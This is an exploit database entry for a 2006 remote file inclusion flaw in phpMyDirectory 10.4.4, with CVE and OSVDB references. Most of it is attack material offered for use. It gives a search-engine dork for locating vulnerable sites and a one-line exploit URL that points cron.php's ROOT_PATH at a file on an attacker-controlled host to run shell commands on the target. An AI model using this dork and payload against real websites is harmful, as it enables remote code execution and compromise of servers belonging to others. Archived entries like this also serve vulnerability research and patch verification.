EXPLOITS

phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion

Author: OLiBekaS
type: webapps
platform: php
port: 
date_added: 2006-05-18  
date_updated:   
verified: 1  
codes: OSVDB-25698;CVE-2006-2521  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 1808.txt  

Title       : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
-
URL         : http://www.phpmydirectory.com/
-
Dork        : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-05-19]